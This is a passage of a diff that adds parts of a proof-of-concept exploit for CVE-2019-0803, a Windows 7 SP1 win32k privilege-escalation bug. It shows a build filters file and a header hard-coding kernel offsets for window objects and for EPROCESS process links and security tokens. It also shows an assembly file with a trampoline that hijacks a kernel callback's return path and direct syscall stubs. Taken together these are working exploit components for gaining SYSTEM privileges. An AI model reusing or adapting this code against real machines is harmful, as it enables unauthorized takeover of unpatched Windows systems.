+  </ImportGroup>
+</Project>

CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/poc_test.vcxproj.filters

@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="源文件">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="头文件">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="资源文件">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h">
+      <Filter>头文件</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>头文件</Filter>
+    </ClInclude>
+    <ClInclude Include="struct.h">
+      <Filter>头文件</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>源文件</Filter>
+    </ClCompile>
+    <ClCompile Include="DDE.cpp">
+      <Filter>源文件</Filter>
+    </ClCompile>
+    <ClCompile Include="main.cpp">
+      <Filter>源文件</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <CustomBuild Include="x64.asm">
+      <Filter>源文件</Filter>
+    </CustomBuild>
+  </ItemGroup>
+</Project>

CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/struct.h

@@ -0,0 +1,154 @@
+#pragma once
+
+#define DDE_SERVER_APP_NAME		L"MyDDEService"
+#define DDE_SERVER_TOPIC_NAME	L"Topic"
+#define DDE_SERVER_ITEM_NAME	L"Item"
+
+#define DDE_SERVER_WINDOW_CAPTION L"DDEServerPoc"
+#define DDE_CLIENT_WINDOW_CAPTION L"DDEClientPoc"
+
+#define MSG_DDESERVER_EXIT			        WM_USER + 1
+#define MSG_DDESERVER_SET_GDI_OBJ_ADDR	    WM_USER + 2
+
+#define LENGTH_TAGWND 0x128
+#define OFFSET_SPWNDPARENT_WIN7 0x58
+#define OFFSET_STRNAME_WIN7 0xD8
+#define OFFSET_CBWNDEXTRA_WIN7 0xE8
+#define OFFSET_APCADDR_WIN7 0x50
+#define OFFSET_APCEPROCESS_WIN7 0x20
+#define OFFSET_SECTOKEN_WIN7 0x208
+#define OFFSET_EPROCESSPID_WIN7 0x180
+#define OFFSET_EPROCESSBLINK_WIN7 0x188
+
+typedef struct _HANDLEENTRY {
+    PVOID   phead;
+    PVOID   pOwner;
+    BYTE    bType;
+    BYTE    bFlags;
+    WORD    wUniq;
+} HANDLEENTRY, * PHANDLEENTRY;
+
+typedef struct _SERVERINFO {
+    WORD    wRIPFlags;
+    WORD    wSRVIFlags;
+    WORD    wRIPPID;
+    WORD    wRIPError;
+    ULONG   cHandleEntries;
+} SERVERINFO, * PSERVERINFO;
+
+typedef struct _SHAREDINFO {
+    PSERVERINFO  psi;
+    PHANDLEENTRY aheList;
+    ULONG        HeEntrySize;
+} SHAREDINFO, * PSHAREDINFO;
+
+
+typedef struct _LARGE_STRING {
+    ULONG Length;
+    ULONG MaximumLength : 31;
+    ULONG bAnsi : 1;
+    PVOID Buffer;
+} LARGE_STRING, * PLARGE_STRING;
+
+typedef struct _PEB
+{
+    BOOLEAN InheritedAddressSpace;
+    BOOLEAN ReadImageFileExecOptions;
+    BOOLEAN BeingDebugged;
+    union
+    {
+        BOOLEAN BitField;
+        struct
+        {
+            BOOLEAN ImageUsesLargePages : 1;
+            BOOLEAN IsProtectedProcess : 1;
+            BOOLEAN IsLegacyProcess : 1;
+            BOOLEAN IsImageDynamicallyRelocated : 1;
+            BOOLEAN SkipPatchingUser32Forwarders : 1;
+            BOOLEAN SpareBits : 3;
+        };
+    };
+    HANDLE Mutant;
+
+    PVOID ImageBaseAddress;
+    PVOID Ldr;
+    PVOID ProcessParameters;
+    PVOID SubSystemData;
+    PVOID ProcessHeap;
+    PRTL_CRITICAL_SECTION FastPebLock;
+    PVOID AtlThunkSListPtr;
+    PVOID IFEOKey;
+    union
+    {
+        ULONG CrossProcessFlags;
+        struct
+        {
+            ULONG ProcessInJob : 1;
+            ULONG ProcessInitializing : 1;
+            ULONG ProcessUsingVEH : 1;
+            ULONG ProcessUsingVCH : 1;
+            ULONG ProcessUsingFTH : 1;
+            ULONG ReservedBits0 : 27;
+        };
+        ULONG EnvironmentUpdateCount;
+    };
+    union
+    {
+        PVOID KernelCallbackTable;
+        PVOID UserSharedInfoPtr;
+    };
+} PEB, * PPEB;
+
+typedef struct _CLIENT_ID {
+    HANDLE UniqueProcess;
+    HANDLE UniqueThread;
+} CLIENT_ID, * PCLIENT_ID;
+
+typedef struct _TEB
+{
+    NT_TIB NtTib;
+    PVOID EnvironmentPointer;
+    CLIENT_ID ClientId;
+    PVOID ActiveRpcHandle;
+    PVOID ThreadLocalStoragePointer;
+    PPEB ProcessEnvironmentBlock;
+    ULONG LastErrorValue;
+    ULONG CountOfOwnedCriticalSections;
+    PVOID CsrClientThread;
+    PVOID Win32ThreadInfo;
+}TEB, * PTEB;
+
+typedef
+PVOID
+(WINAPI* pfRtlAllocateHeap)(
+    PVOID HeapHandle,
+    ULONG Flags,
+    SIZE_T Size
+    );
+
+extern "C"
+HACCEL
+NtUserCreateAcceleratorTable(
+    LPACCEL Entries,
+    ULONG EntriesCount
+);
+
+extern "C"
+BOOL
+NtUserShowWindow(
+    IN HWND hwnd,
+    IN int nCmdShow
+);
+
+extern "C"
+HDC
+NtUserBeginPaint(
+    IN HWND hwnd,
+    OUT LPPAINTSTRUCT lpPaint
+);
+
+extern "C"
+BOOL
+NtUserDestroyWindow(
+    IN HWND hwnd
+);

CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/x64.asm

@@ -0,0 +1,50 @@
+EXTERN  g_ClientCopyDDEIn1_ContinueAddr:DQ;
+EXTERN  g_BitMapAddr:DQ;
+
+.CODE  ;; ´úÂë¶Î
+
+HijackTrampoFunc PROC
+	push	r8
+	lea		rax,[rsp+50h] 
+	mov		r8,qword ptr g_BitMapAddr
+	mov		qword ptr [rax+30h],r8 
+	mov		r8,qword ptr [rax+20h] 
+	mov		byte ptr [r8+2],2 
+	pop		r8 
+	pop		rax
+	xor		r8d,r8d 
+	mov		r11d,eax 
+	lea		rcx,[rsp+20h]
+	lea     edx,[r8+18h] 
+	jmp		qword ptr g_ClientCopyDDEIn1_ContinueAddr
+HijackTrampoFunc ENDP
+
+NtUserCreateAcceleratorTable PROC
+    mov     r10,rcx
+    mov     eax,10F1h
+    syscall
+    ret
+NtUserCreateAcceleratorTable ENDP
+
+NtUserShowWindow PROC
+    mov     r10,rcx
+    mov     eax,1058h
+    syscall
+    ret
+NtUserShowWindow ENDP
+
+NtUserBeginPaint PROC
+    mov     r10,rcx
+    mov     eax,1017h
+    syscall
+    ret
+NtUserBeginPaint ENDP
+
+NtUserDestroyWindow PROC
+    mov     r10,rcx
+    mov     eax,109dh
+    syscall
+    ret
+NtUserDestroyWindow ENDP
+
+END